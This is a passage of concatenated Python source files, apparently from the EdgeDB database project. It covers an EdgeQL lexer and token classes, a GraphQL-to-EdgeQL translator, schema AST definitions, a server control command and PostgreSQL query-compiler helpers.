(?P=Q) # match closing quote type with whatever is in Q
'''),
Rule(token='BADIDENT',
next_state=STATE_KEEP,
regexp=r'''
__[^\W\d]\w*__
|
`__.*?__`
'''),
Rule(token='IDENT',
next_state=STATE_KEEP,
regexp=r'[^\W\d]\w*'),
Rule(token='QIDENT',
next_state=STATE_KEEP,
regexp=r'`[^@].*?`'),
Rule(token='self',
next_state=STATE_KEEP,
regexp=r'[\{\}$]'),
]
states = {
STATE_BASE:
common_rules,
}
def token_from_text(self, rule_token, txt):
if rule_token == 'BADIDENT':
self.handle_error(txt)
tok = super().token_from_text(rule_token, txt)
if rule_token == 'self':
tok = tok._replace(type=txt)
elif rule_token == 'QIDENT':
tok = tok._replace(type='IDENT', value=txt[1:-1])
return tok
def lex(self):
buffer = []
for tok in super().lex():
tok_type = tok.type
if tok_type in {'WS', 'NL', 'COMMENT'}:
# Strip out whitespace and comments
continue
else:
if buffer:
yield from iter(buffer)
buffer[:] = []
yield tok
def lex_highlight(self):
return super().lex()
```
#### File: parser/grammar/tokens.py
```python
import re
import sys
import types
from edb.lang.common import parsing
from . import keywords
from . import precedence
from . import lexer
clean_string = re.compile(r"'(?:\s|\n)+'")
string_quote = re.compile(lexer.re_dquote)
class TokenMeta(parsing.TokenMeta):
pass
class Token(parsing.Token, metaclass=TokenMeta,
precedence_class=precedence.PrecedenceMeta):
pass
class T_DOT(Token, lextoken='.'):
pass
class T_DOTFW(Token, lextoken='.>'):
pass
class T_DOTBW(Token, lextoken='.<'):
pass
class T_LBRACKET(Token, lextoken='['):
pass
class T_RBRACKET(Token, lextoken=']'):
pass
class T_LPAREN(Token, lextoken='('):
pass
class T_RPAREN(Token, lextoken=')'):
pass
class T_LBRACE(Token, lextoken='{'):
pass
class T_RBRACE(Token, lextoken='}'):
pass
class T_DOUBLECOLON(Token, lextoken='::'):
pass
class T_DOUBLEQMARK(Token, lextoken='??'):
pass
class T_COLON(Token, lextoken=':'):
pass
class T_SEMICOLON(Token, lextoken=';'):
pass
class T_COMMA(Token, lextoken=','):
pass
class T_PLUS(Token, lextoken='+'):
pass
class T_MINUS(Token, lextoken='-'):
pass
class T_STAR(Token, lextoken='*'):
pass
class T_SLASH(Token, lextoken='/'):
pass
class T_PERCENT(Token, lextoken='%'):
pass
class T_CIRCUMFLEX(Token, lextoken='^'):
pass
class T_AT(Token, lextoken='@'):
pass
class T_DOLLAR(Token, lextoken='$'):
pass
class T_TURNSTILE(Token):
pass
class T_ARROW(Token):
pass
class T_LANGBRACKET(Token, lextoken='<'):
pass
class T_RANGBRACKET(Token, lextoken='>'):
pass
class T_EQUALS(Token, lextoken='='):
pass
class T_ICONST(Token):
pass
class T_FCONST(Token):
pass
class T_SCONST(Token):
def __init__(self, parser, val, context=None):
super().__init__(parser, val, context)
# the process of string normalization is slightly different for
# regular '-quoted strings and $$-quoted ones
if val[0] in ("'", '"'):
self.string = clean_string.sub('', val[1:-1].replace(
R"\'", "'").replace(R'\"', '"'))
else:
# Because of implicit string concatenation there may
# be more than one pair of dollar quotes in the val.
# We want to grab every other chunk from splitting the
# val with the quote.
quote = string_quote.match(val).group(0)
self.string = ''.join((
part for n, part in enumerate(val.split(quote))
if n % 2 == 1))
class T_IDENT(Token):
pass
class T_OP(Token):
pass
def _gen_keyword_tokens():
# Define keyword tokens
mod = sys.modules[__name__]
def clsexec(ns):
ns['__module__'] = __name__
return ns
for val, (token, typ) in keywords.edgeql_keywords.items():
clsname = 'T_{}'.format(token)
clskwds = dict(metaclass=parsing.TokenMeta, token=token)
cls = types.new_class(clsname, (Token,), clskwds, clsexec)
setattr(mod, clsname, cls)
_gen_keyword_tokens()
```
#### File: lang/graphql/translator.py
```python
from collections import namedtuple
from graphql import graphql as gql_proc, GraphQLString, GraphQLID
import json
import re
from edb.lang import edgeql
from edb.lang.common import ast
from edb.lang.edgeql import ast as qlast
from edb.lang.graphql import ast as gqlast, parser as gqlparser
from edb.lang.schema import error as s_error
from . import types as gt
from .errors import GraphQLValidationError, GraphQLCoreError
class GraphQLTranslatorContext:
def __init__(self, *, schema, gqlcore, variables, operation_name, query):
self.schema = schema
self.variables = variables
self.operation_name = operation_name
self.fragments = {}
self.validated_fragments = {}
self.vars = {}
self.fields = []
self.path = []
self.filter = None
self.include_base = [False]
self.gql_schema = gt.Schema(gqlcore)
self.gqlcore_schema = gqlcore._gql_schema
self.query = query
Step = namedtuple('Step', ['name', 'type'])
Field = namedtuple('Field', ['name', 'value'])
class GraphQLTranslator(ast.NodeVisitor):
def get_type(self, name, *, context=None):
# the type may be from the EdgeDB schema or some special
# GraphQL type/adapter
assert isinstance(name, str)
try:
return self._context.gql_schema.get(name)
except s_error.SchemaError:
if context:
raise GraphQLValidationError(
f"{name!r} does not exist in the schema",
context=context)
raise
def get_field_type(self, base, name, *, args=None, context=None):
try:
target = base.get_field_type(name, args)
except s_error.SchemaError:
if not context:
raise
target = None
if target is None:
if context:
raise GraphQLValidationError(
f"field {name!r} is " +
f"invalid for {base.short_name}",
context=context)
return target
def visit_Document(self, node):
# we need to index all of the fragments before we process operations
self._context.fragments = {
f.name: f for f in node.definitions
if isinstance(f, gqlast.FragmentDefinition)
}
gqlresult = gql_proc(
self._context.gqlcore_schema,
self._context.query,
variable_values={
name[1:]: val for name, val in self._context.variables.items()
},
operation_name=self._context.operation_name,
)
if gqlresult.errors:
for err in gqlresult.errors:
raise GraphQLCoreError(
err.message,
line=err.locations[0].line,
col=err.locations[0].column,
)
translated = dict(
d for d in self.visit(node.definitions) if d is not None)
eql = next(v for v in translated.values())
for el in eql[0].result.elements:
# swap in the json bits
if (isinstance(el.compexpr, qlast.TypeCast) and
el.compexpr.type.maintype.name == 'json'):
name = el.expr.steps[0].ptr.name
el.compexpr.expr.value = json.dumps(
gqlresult.data[name], indent=4)
return translated
def visit_FragmentDefinition(self, node):
# fragments are already processed, no need to do anything here
return None
def visit_OperationDefinition(self, node):
# create a dict of variables that will be marked as
# critical or not
self._context.vars = {
name: [val, False]
for name, val in self._context.variables.items()}
opname = None
if (self._context.operation_name and
node.name != self._context.operation_name):
return None
if node.type is None or node.type == 'query':
stmt = self._visit_query(node)
if node.name:
opname = f'query {node.name}'
elif node.type == 'mutation':
stmt = self._visit_mutation(node)
if node.name:
opname = f'mutation {node.name}'
else:
raise ValueError(f'unsupported definition type: {node.type!r}')
# produce the list of variables critical to the shape
# of the query
critvars = [(name, val) for name, (val, crit)
in self._context.vars.items() if crit]
critvars.sort()
return (opname, (stmt, critvars))
def _visit_query(self, node):
# populate input variables with defaults, where applicable
if node.variables:
self.visit(node.variables)
# base Query needs to be configured specially
base = self._context.gql_schema.get('Query')
# special treatment of the selection_set, different from inner
# recursion
query = qlast.SelectQuery(
result=qlast.Shape(
expr=qlast.Path(
steps=[qlast.ObjectRef(name='Query', module='graphql')]
),
elements=[]
),
)
self._context.fields.append({})
self._context.path.append([Step(None, base)])
query.result.elements = self.visit(node.selection_set)
self._context.fields.pop()
self._context.path.pop()
return query
def _visit_mutation(self, node):
raise NotImplementedError
def _should_include(self, directives):
for directive in directives:
if directive.name in ('include', 'skip'):
cond = [a.value for a in directive.arguments
if a.name == 'if'][0]
if isinstance(cond, gqlast.Variable):
var = self._context.vars[cond.value]
cond = var[0]
var[1] = True # mark the variable as critical
else:
cond = cond.value
if not isinstance(cond, bool):
raise GraphQLValidationError(
f"'if' argument of {directive.name} " +
"directive must be a Boolean",
context=directive.context)
if directive.name == 'include' and cond is False:
return False
elif directive.name == 'skip' and cond is True:
return False
return True
def visit_VariableDefinition(self, node):
variables = self._context.vars
if not variables.get(node.name):
if node.value is None:
variables[node.name] = [None, False]
else:
variables[node.name] = [node.value.topython(), False]
def visit_SelectionSet(self, node):
elements = []
for sel in node.selections:
if not self._should_include(sel.directives):
continue
spec = self.visit(sel)
if spec is not None:
elements.append(spec)
elements = self.combine_field_results(elements)
return elements
def _is_duplicate_field(self, node):
# if this field is a duplicate, that is not identical to the
# original, throw an exception
name = node.alias or node.name
dup = self._context.fields[-1].get(name)
if dup:
return True
else:
self._context.fields[-1][name] = node
return False
# XXX: this might need to be trimmed
def _is_top_level_field(self, node, fail=None):
top = False
path = self._context.path[-1]
# there is different handling of top-level, built-in and inner
# fields
top = (len(self._context.path) == 1 and
len(path) == 1 and
path[0].name is None)
prevt = path[-1].type
target = self.get_field_type(
prevt, node.name,
args={
arg.name: self._get_field_arg_value(arg)
for arg in node.arguments
},
context=node.context)
path.append(Step(name=node.name, type=target))
if not top and fail:
raise GraphQLValidationError(
f"field {node.name!r} can only appear at the top-level Query",
context=node.context)
return top
def _get_field_arg_value(self, arg):
if isinstance(arg.value, gqlast.Variable):
return self._context.vars[arg.value.value]
elif isinstance(arg.value, gqlast.InputObjectLiteral):
# this value only matters for introspection, but
# introspection can never have an InputObjectLiteral
return {}
else:
return arg.value.topython()
def _get_parent_and_current_type(self):
path = self._context.path[-1]
cur = path[-1].type
if len(path) > 1:
par = path[-2].type
else:
par = self._context.path[-2][-1].type
return par, cur
def _prepare_field(self, node):
path = self._context.path[-1]
include_base = self._context.include_base[-1]
is_top = self._is_top_level_field(node)
spath = self._context.path[-1]
prevt, target = self._get_parent_and_current_type()
# insert normal or specialized link
steps = []
if include_base:
base = spath[0].type
steps.append(qlast.ObjectRef(
module=base.module, name=base.short_name))
steps.append(qlast.Ptr(
ptr=qlast.ObjectRef(
name=node.name
)
))
return is_top, path, prevt, target, steps
def visit_Field(self, node):
if self._is_duplicate_field(node):
return
is_top, path, prevt, target, steps = \
self._prepare_field(node)
json_mode = False
# determine if there needs to be extra subqueries
if not prevt.dummy and target.dummy:
json_mode = True
# this is a special introspection type
eql, shape, filterable = target.get_template()
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
name=node.alias or node.name
)
)]
),
compexpr=eql,
)
elif prevt.is_field_shadowed(node.name):
if prevt.has_native_field(node.name) and not node.alias:
spec = filterable = shape = qlast.ShapeElement(
expr=qlast.Path(steps=steps),
)
else:
prefix = qlast.Path(steps=self.get_path_prefix(-1))
eql, shape, filterable = prevt.get_field_template(
node.name,
parent=prefix,
has_shape=bool(node.selection_set)
)
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
# this is already a sub-query
name=node.alias or node.name
)
)]
),
compexpr=eql
)
else:
# if the parent is NOT a shadowed type, we need an explicit SELECT
eql, shape, filterable = target.get_template()
spec = qlast.ShapeElement(
expr=qlast.Path(
steps=[qlast.Ptr(
ptr=qlast.ObjectRef(
# this is already a sub-query
name=node.alias or node.name
)
)]
),
compexpr=eql
)
if node.selection_set is not None:
if json_mode:
pass
else:
# a single recursion target, so we can process
# selection set now
self._context.fields.append({})
vals = self.visit(node.selection_set)
self._context.fields.pop()
if shape:
shape.elements = vals
if filterable:
where, orderby, offset, limit = \
self._visit_arguments(node.arguments)
filterable.where = where
filterable.orderby = orderby
filterable.offset = offset
filterable.limit = limit
path.pop()
return spec
def visit_InlineFragment(self, node):
self._validate_fragment_type(node, node)
result = self.visit(node.selection_set)
if node.on is not None:
self._context.path.pop()
return result
def visit_FragmentSpread(self, node):
frag = self._context.fragments[node.name]
self._validate_fragment_type(frag, node)
# in case of secondary type, recurse into a copy to avoid
# memoized results
selection_set = frag.selection_set
result = self.visit(selection_set)
self._context.path.pop()
return result
def _validate_fragment_type(self, frag, spread):
is_specialized = False
base_type = None
# validate the fragment type w.r.t. the base
if frag.on is None:
return
# validate the base if it's nested
if len(self._context.path) > 0:
path = self._context.path[-1]
base_type = path[-1].type
frag_type = self.get_type(frag.on)
if base_type.issubclass(frag_type):
# legal hierarchy, no change
pass
elif frag_type.issubclass(base_type):
# specialized link, but still legal
is_specialized = True
else:
raise GraphQLValidationError(
f"{base_type.short_name} and {frag_type.short_name} " +
"are not related", context=spread.context)
self._context.path.append([Step(frag.on, frag_type)])
self._context.include_base.append(is_specialized)
def _visit_arguments(self, arguments):
where = offset = limit = None
orderby = []
for arg in arguments:
if arg.name == 'filter':
where = self.visit(arg.value)
elif arg.name == 'order':
orderby = self.visit_order(arg.value)
return where, orderby, offset, limit
def get_path_prefix(self, end_trim=None):
# flatten the path
path = [step
for psteps in self._context.path
for step in psteps]
# find the first shadowed root
for i, step in enumerate(path):
base = step.type
if base.shadow:
break
# trim the rest of the path
path = path[i + 1:end_trim]
prefix = [
qlast.ObjectRef(module=base.module, name=base.short_name)
]
prefix.extend(
qlast.Ptr(ptr=qlast.ObjectRef(name=step.name))
for step in path
)
return prefix
def visit_ListLiteral(self, node):
return qlast.Array(elements=self.visit(node.value))
def visit_InputObjectLiteral(self, node):
# this represents some expression to be used in filter
result = []
for field in node.value:
result.append(self.visit(field))
return self._join_expressions(result)
def visit_ObjectField(self, node):
fname = node.name
# handle boolean ops
if fname == 'and':
return self._visit_list_of_inputs(node.value.value, ast.ops.AND)
elif fname == 'or':
return self._visit_list_of_inputs(node.value.value, ast.ops.OR)
elif fname == 'not':
return qlast.UnaryOp(op=ast.ops.NOT,
operand=self.visit(node.value))
# handle various scalar ops
op = gt.GQL_TO_OPS_MAP.get(fname)
if op:
value = self.visit(node.value)
return qlast.BinOp(left=self._context.filter, op=op, right=value)
# we're at the beginning of a scalar op
_, target = self._get_parent_and_current_type()
name = self.get_path_prefix()
name.append(qlast.Ptr(ptr=qlast.ObjectRef(name=fname)))
name = qlast.Path(steps=name)
# potentially need to cast the 'name' side into a <str>, so as
# to be compatible with the 'value'
typename = target.get_field_type(fname).short_name
if (typename != 'str' and
gt.EDB_TO_GQL_SCALARS_MAP[typename] in {GraphQLString,
GraphQLID}):
name = qlast.TypeCast(
expr=name,
type=qlast.TypeName(maintype=qlast.ObjectRef(name='str')),
)
self._context.filter = name
return self.visit(node.value)
def visit_order(self, node):
# if there is no specific ordering, then order by id
if not node.value:
return [qlast.SortExpr(
path=qlast.Path(
steps=[qlast.Ptr(ptr=qlast.ObjectRef(name='id'))],
partial=True,
),
direction=qlast.SortAsc,
)]
# Ordering is handled by specifying a list of special Ordering objects.
# Validation is already handled by this point.
orderby = []
for enum in node.value:
name, direction, nulls = self._visit_order_item(enum)
orderby.append(qlast.SortExpr(
path=qlast.Path(
steps=[qlast.Ptr(ptr=qlast.ObjectRef(name=name))],
partial=True,
),
direction=direction,
nones_order=nulls,
))
return orderby
def _visit_order_item(self, node):
name = node.name
direction = nulls = None
for part in node.value.value:
if part.name == 'dir':
direction = part.value.value
if part.name == 'nulls':
nulls = part.value.value
# direction is a required field, so we can rely on it having
# one of two values
if direction == 'ASC':
direction = qlast.SortAsc
# nulls are optional, but are 'SMALLEST' by default
if nulls == 'BIGGEST':
nulls = qlast.NonesLast
else:
nulls = qlast.NonesFirst
else: # DESC
direction = qlast.SortDesc
# nulls are optional, but are 'SMALLEST' by default
if nulls == 'BIGGEST':
nulls = qlast.NonesFirst
else:
nulls = qlast.NonesLast
return name, direction, nulls
def visit_Variable(self, node):
return qlast.Parameter(name=node.value[1:])
def visit_Literal(self, node):
return qlast.Constant(value=node.value)
def _visit_list_of_inputs(self, inputs, op):
result = [self.visit(node) for node in inputs]
return self._join_expressions(result, op)
def _join_expressions(self, exprs, op=ast.ops.AND):
if not exprs:
return None
elif len(exprs) == 1:
return exprs[0]
result = qlast.BinOp(
left=exprs[0],
op=op,
right=exprs[1]
)
for expr in exprs[2:]:
result = qlast.BinOp(
left=result,
op=op,
right=expr
)
return result
def combine_field_results(self, results, *, flatten=True):
if flatten:
flattened = []
for res in results:
if isinstance(res, Field):
flattened.append(res)
elif ast.is_container(res):
flattened.extend(res)
else:
flattened.append(res)
return flattened
else:
return results
def translate(schema, graphql, *, variables=None, operation_name=None):
if variables is None:
variables = {}
# HACK
query = re.sub(r'@edgedb\(.*?\)', '', graphql)
schema2 = gt.GQLCoreSchema(schema)
parser = gqlparser.GraphQLParser()
gqltree = parser.parse(graphql)
context = GraphQLTranslatorContext(
schema=schema, gqlcore=schema2, query=query,
variables=variables, operation_name=operation_name)
edge_forest_map = GraphQLTranslator(context=context).visit(gqltree)
code = []
for name, (tree, critvars) in sorted(edge_forest_map.items()):
if name:
code.append(f'# {name}')
if critvars:
crit = [f'{vname}={val!r}' for vname, val in critvars]
code.append(f'# critical variables: {", ".join(crit)}')
code += [edgeql.generate_source(tree), ';']
return '\n'.join(code)
```
#### File: lang/schema/ast.py
```python
import typing
from edb.lang.common import enum as s_enum
from edb.lang.common import ast, parsing
from edb.lang.edgeql import ast as qlast
class Base(ast.AST):
__ast_hidden__ = {'context'}
context: parsing.ParserContext
def _extra_repr(self):
return ''
def __repr__(self):
ar = self._extra_repr()
return '<{}.{} at {:#x}{}>'.format(self.__class__.ns,
self.__class__.__name__,
id(self),
ar)
class Spec(Base):
inherited: bool = False
class Attribute(Spec):
name: qlast.ObjectRef
value: qlast.Base
class Policy(Spec):
__fields = ['event', 'action'] # TODO: type this
class Constraint(Spec):
args: typing.List[qlast.FuncArg]
attributes: typing.List[Attribute]
delegated: bool = False
name: qlast.ObjectRef
subject: typing.Optional[qlast.Expr]
class Pointer(Spec):
name: qlast.ObjectRef
# Computable links don't have a target
target: typing.Optional[typing.List[qlast.TypeName]]
attributes: typing.List[Attribute]
constraints: typing.List[Constraint]
policies: typing.List[Policy]
required: bool = False
# Expression of a computable link
expr: qlast.Base = None
class Index(Spec):
name: qlast.ObjectRef
expression: qlast.Base
class Property(Pointer):
pass
class Link(Pointer):
properties: typing.List[Property]
# # XXX: to be killed
# class Property(Property):
# pass
class Declaration(Base):
name: str
extends: typing.List[qlast.TypeName]
attributes: typing.List[Attribute]
class ActionDeclaration(Declaration):
pass
class ScalarTypeDeclaration(Declaration):
abstract: bool = False
final: bool = False
constraints: typing.List[Constraint]
class AttributeDeclaration(Declaration):
type: typing.Optional[qlast.TypeName]
class ObjectTypeDeclaration(Declaration):
abstract: bool = False
final: bool = False
links: typing.List[Link]
properties: typing.List[Property]
indexes: typing.List[Index]
constraints: typing.List[Constraint]
class ConstraintDeclaration(Declaration):
abstract: bool = False
args: typing.List[qlast.Base]
subject: typing.Optional[qlast.Expr]
class EventDeclaration(Declaration):
pass
class ViewDeclaration(Declaration):
pass
class Language(s_enum.StrEnum):
SQL = 'SQL'
EdgeQL = 'EDGEQL'
class FunctionCode(Base):
language: Language
code: qlast.Base
from_name: str
class FunctionDeclaration(Declaration):
args: list
returning: qlast.TypeName
aggregate: bool = False
initial_value: qlast.Base
code: FunctionCode
set_returning: str = ''
class BasePointerDeclaration(Declaration):
abstract: bool = False
indexes: typing.List[Index]
constraints: typing.List[Constraint]
policies: typing.List[Policy]
class PropertyDeclaration(BasePointerDeclaration):
pass
class LinkDeclaration(BasePointerDeclaration):
properties: typing.List[Property]
class Import(Base):
modules: list
class ImportModule(Base):
module: str
alias: str = None
class Schema(Base):
# TODO: Remove union type
declarations: typing.List[typing.Union[Declaration, Import]]
```
#### File: server/ctl/__init__.py
```python
import argparse
import sys
from . import init as init_mod
def main(argv=sys.argv[1:], env=None):
parser = argparse.ArgumentParser(description='EdgeDB Server Control')
backend_info = parser.add_mutually_exclusive_group(required=True)
backend_info.add_argument(
'-D', '--data-dir', type=str, help='database cluster directory')
backend_info.add_argument(
'-P', '--postgres', type=str,
help='address of Postgres backend server')
parser.add_argument(
'--postgres-superuser', type=str, default='postgres', metavar='ROLE',
help='name of Postgres superuser role (use with --postgres)')
sub = parser.add_subparsers(title='control commands', dest='command')
sub.required = True
sub.add_parser('init', help='initialize EdgeDB cluster')
args = parser.parse_args(argv)
if args.command == 'init':
init_mod.main(args, env)
if __name__ == '__main__':
main()
```
#### File: pgsql/compiler/dbobj.py
```python
import typing
from edb.lang.ir import ast as irast
from edb.lang.schema import objtypes as s_objtypes
from edb.lang.schema import links as s_links
from edb.lang.schema import objects as s_obj
from edb.lang.schema import pointers as s_pointers
from edb.server.pgsql import ast as pgast
from edb.server.pgsql import common
from edb.server.pgsql import types as pgtypes
from . import context
def range_for_material_objtype(
objtype: s_objtypes.ObjectType,
path_id: irast.PathId, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
from . import pathctx # XXX: fix cycle
objtype = objtype.material_type()
table_schema_name, table_name = common.objtype_name_to_table_name(
objtype.name, catenate=False)
if objtype.name.module == 'schema':
# Redirect all queries to schema tables to edgedbss
table_schema_name = 'edgedbss'
relation = pgast.Relation(
schemaname=table_schema_name,
name=table_name,
path_id=path_id,
)
rvar = pgast.RangeVar(
relation=relation,
alias=pgast.Alias(
aliasname=env.aliases.get(objtype.name.name)
)
)
overlays = env.rel_overlays.get(objtype.name)
if overlays and include_overlays:
set_ops = []
qry = pgast.SelectStmt()
qry.from_clause.append(rvar)
pathctx.put_path_value_rvar(qry, path_id, rvar, env=env)
qry.path_scope.add(path_id)
set_ops.append(('union', qry))
for op, cte in overlays:
rvar = pgast.RangeVar(
relation=cte,
alias=pgast.Alias(
aliasname=env.aliases.get(hint=cte.name)
)
)
qry = pgast.SelectStmt(
from_clause=[rvar],
)
pathctx.put_path_value_rvar(qry, path_id, rvar, env=env)
qry.path_scope.add(path_id)
if op == 'replace':
op = 'union'
set_ops = []
set_ops.append((op, qry))
rvar = range_from_queryset(set_ops, objtype, env=env)
return rvar
def range_for_objtype(
objtype: s_objtypes.ObjectType,
path_id: irast.PathId, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
from . import pathctx # XXX: fix cycle
if not objtype.is_virtual:
rvar = range_for_material_objtype(
objtype, path_id, include_overlays=include_overlays, env=env)
else:
# Union object types are represented as a UNION of selects
# from their children, which is, for most purposes, equivalent
# to SELECTing from a parent table.
children = frozenset(objtype.children(env.schema))
set_ops = []
for child in children:
c_rvar = range_for_objtype(
child, path_id=path_id,
include_overlays=include_overlays, env=env)
qry = pgast.SelectStmt(
from_clause=[c_rvar],
)
pathctx.put_path_value_rvar(qry, path_id, c_rvar, env=env)
qry.path_scope.add(path_id)
set_ops.append(('union', qry))
rvar = range_from_queryset(set_ops, objtype, env=env)
rvar.query.is_distinct = True
rvar.query.path_id = path_id
return rvar
def range_for_set(
ir_set: irast.Set, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
rvar = range_for_objtype(
ir_set.scls, ir_set.path_id,
include_overlays=include_overlays, env=env)
return rvar
def table_from_ptrcls(
ptrcls: s_links.Link, *,
env: context.Environment) -> pgast.RangeVar:
"""Return a Table corresponding to a given Link."""
table_schema_name, table_name = common.get_table_name(
ptrcls, catenate=False)
pname = ptrcls.shortname
if pname.module == 'schema':
# Redirect all queries to schema tables to edgedbss
table_schema_name = 'edgedbss'
relation = pgast.Relation(
schemaname=table_schema_name, name=table_name)
rvar = pgast.RangeVar(
relation=relation,
alias=pgast.Alias(
aliasname=env.aliases.get(pname.name)
)
)
return rvar
def range_for_ptrcls(
ptrcls: s_links.Link, direction: s_pointers.PointerDirection, *,
include_overlays: bool=True,
env: context.Environment) -> pgast.BaseRangeVar:
""""Return a Range subclass corresponding to a given ptr step.
If `ptrcls` is a generic link, then a simple RangeVar is returned,
otherwise the return value may potentially be a UNION of all tables
corresponding to a set of specialized links computed from the given
`ptrcls` taking source inheritance into account.
"""
linkname = ptrcls.shortname
endpoint = ptrcls.source
tgt_col = pgtypes.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=True).column_name
cols = [
'std::source',
tgt_col
]
set_ops = []
ptrclses = set()
for source in {endpoint} | set(endpoint.descendants(env.schema)):
# Sift through the descendants to see who has this link
try:
src_ptrcls = source.pointers[linkname].material_type()
except KeyError:
# This source has no such link, skip it
continue
else:
if src_ptrcls in ptrclses:
# Seen this link already
continue
ptrclses.add(src_ptrcls)
table = table_from_ptrcls(src_ptrcls, env=env)
qry = pgast.SelectStmt()
qry.from_clause.append(table)
qry.rptr_rvar = table
# Make sure all property references are pulled up properly
for colname in cols:
selexpr = pgast.ColumnRef(
name=[table.alias.aliasname, colname])
qry.target_list.append(
pgast.ResTarget(val=selexpr, name=colname))
set_ops.append(('union', qry))
overlays = env.rel_overlays.get(src_ptrcls.shortname)
if overlays and include_overlays:
for op, cte in overlays:
rvar = pgast.RangeVar(
relation=cte,
alias=pgast.Alias(
aliasname=env.aliases.get(cte.name)
)
)
qry = pgast.SelectStmt(
target_list=[
pgast.ResTarget(
val=pgast.ColumnRef(
name=[col]
)
)
for col in cols
],
from_clause=[rvar],
)
set_ops.append((op, qry))
rvar = range_from_queryset(set_ops, ptrcls, env=env)
return rvar
def range_for_pointer(
pointer: s_links.Link, *,
env: context.Environment) -> pgast.BaseRangeVar:
ptrcls = pointer.ptrcls
if ptrcls.derived_from is not None:
ptrcls = ptrcls.get_nearest_non_derived_parent()
return range_for_ptrcls(ptrcls, pointer.direction, env=env)
def range_from_queryset(
set_ops: typing.Sequence[typing.Tuple[str, pgast.BaseRelation]],
scls: s_obj.Object, *,
env: context.Environment) -> pgast.BaseRangeVar:
if len(set_ops) > 1:
# More than one class table, generate a UNION/EXCEPT clause.
qry = pgast.SelectStmt(
all=True,
larg=set_ops[0][1]
)
for op, rarg in set_ops[1:]:
qry.op, qry.rarg = op, rarg
qry = pgast.SelectStmt(
all=True,
larg=qry
)
qry = qry.larg
rvar = pgast.RangeSubselect(
subquery=qry,
alias=pgast.Alias(
aliasname=env.aliases.get(scls.shortname.name)
)
)
else:
# Just one class table, so return it directly
rvar = set_ops[0][1].from_clause[0]
return rvar
def get_column(
rvar: pgast.BaseRangeVar,
colspec: typing.Union[str, pgast.ColumnRef], *,
optional: bool=False, nullable: bool=None) -> pgast.ColumnRef:
if isinstance(colspec, pgast.ColumnRef):
colname = colspec.name[-1]
if nullable is None:
nullable = colspec.nullable
optional = colspec.optional
else:
colname = colspec
if nullable is None:
# Assume the column is nullable unless told otherwise.
nullable = True
if rvar is None:
name = [colname]
else:
name = [rvar.alias.aliasname, colname]
return pgast.ColumnRef(name=name, nullable=nullable, optional=optional)
def rvar_for_rel(
rel: pgast.BaseRelation, *,
lateral: bool=False, colnames: typing.List[str]=[],
env: context.Environment) -> pgast.BaseRangeVar:
if isinstance(rel, pgast.Query):
alias = env.aliases.get(rel.name or 'q')
rvar = pgast.RangeSubselect(
subquery=rel,
alias=pgast.Alias(aliasname=alias, colnames=colnames),
lateral=lateral,
)
else:
alias = env.aliases.get(rel.name)
rvar = pgast.RangeVar(
relation=rel,
alias=pgast.Alias(aliasname=alias, colnames=colnames)
)
return rvar
def get_rvar_var(
rvar: typing.Optional[pgast.BaseRangeVar], var: pgast.OutputVar,
*, optional: bool=False, nullable: bool=None) \
-> typing.Union[pgast.ColumnRef, pgast.TupleVar]:
assert isinstance(var, pgast.OutputVar)
if isinstance(var, pgast.TupleVar):
elements = []
for el in var.elements:
val = get_rvar_var(rvar, el.name)
elements.append(
pgast.TupleElement(
path_id=el.path_id, name=el.name, val=val))
fieldref = pgast.TupleVar(elements, named=var.named)
else:
fieldref = get_column(rvar, var, optional=optional,
nullable=nullable)
return fieldref
def add_rel_overlay(
scls: s_objtypes.ObjectType, op: str, rel: pgast.BaseRelation, *,
env: context.Environment) -> None:
overlays = env.rel_overlays[scls.name]
overlays.append((op, rel))
def cte_for_query(
rel: pgast.Query, *,
env: context.Environment) -> pgast.CommonTableExpr:
return pgast.CommonTableExpr(
query=rel,
alias=pgast.Alias(
aliasname=env.aliases.get(rel.name)
)
)
def cols_for_pointer(
pointer: s_pointers.Pointer, *,
env: context.Environment) -> typing.List[str]:
cols = ['ptr_item_id']
if isinstance(pointer, s_links.Link):
for ptr in pointer.pointers.values():
cols.append(common.edgedb_name_to_pg_name(ptr.shortname))
else:
cols.extend(('std::source', 'std::target'))
return cols
```
#### File: pgsql/compiler/output.py
```python
from edb.server.pgsql import ast as pgast
from . import context
def tuple_var_as_json_object(tvar, *, env):
if not tvar.named:
return pgast.FuncCall(
name=('jsonb_build_array',),
args=[serialize_expr(t.val, nested=True, env=env)
for t in tvar.elements],
null_safe=True, nullable=tvar.nullable)
else:
keyvals = []
for element in tvar.elements:
rptr = element.path_id.rptr()
if rptr is None:
name = element.path_id[-1].name.name
else:
name = rptr.shortname.name
if rptr.is_link_property():
name = '@' + name
keyvals.append(pgast.Constant(val=name))
if isinstance(element.val, pgast.TupleVar):
val = serialize_expr(element.val, env=env)
else:
val = element.val
keyvals.append(val)
return pgast.FuncCall(
name=('jsonb_build_object',),
args=keyvals, null_safe=True, nullable=tvar.nullable)
def in_serialization_ctx(ctx: context.CompilerContextLevel) -> bool:
return ctx.expr_exposed is None or ctx.expr_exposed
def output_as_value(
expr: pgast.Base, *,
env: context.Environment) -> pgast.Base:
if isinstance(expr, pgast.TupleVar):
val = pgast.ImplicitRowExpr(args=[
output_as_value(e.val, env=env) for e in expr.elements
])
else:
val = expr
return val
def serialize_expr_if_needed(
expr: pgast.Base, *,
ctx: context.CompilerContextLevel) -> pgast.Base:
if in_serialization_ctx(ctx):
val = serialize_expr(expr, env=ctx.env)
else:
val = expr
return val
def serialize_expr(
expr: pgast.Base, *,
nested: bool=False,
env: context.Environment) -> pgast.Base:
if env.output_format == context.OutputFormat.JSON:
if isinstance(expr, pgast.TupleVar):
val = tuple_var_as_json_object(expr, env=env)
elif isinstance(expr, pgast.ImplicitRowExpr):
val = pgast.FuncCall(
name=('jsonb_build_array',), args=expr.args,
null_safe=True)
elif not nested:
val = pgast.FuncCall(
name=('to_jsonb',), args=[expr], null_safe=True)
else:
val = expr
elif env.output_format == context.OutputFormat.NATIVE:
val = output_as_value(expr, env=env)
else:
raise RuntimeError(f'unexpected output format: {env.output_format!r}')
return val
def top_output_as_value(
stmt: pgast.Query, *,
env: context.Environment) -> pgast.Query:
"""Finalize output serialization on the top level."""
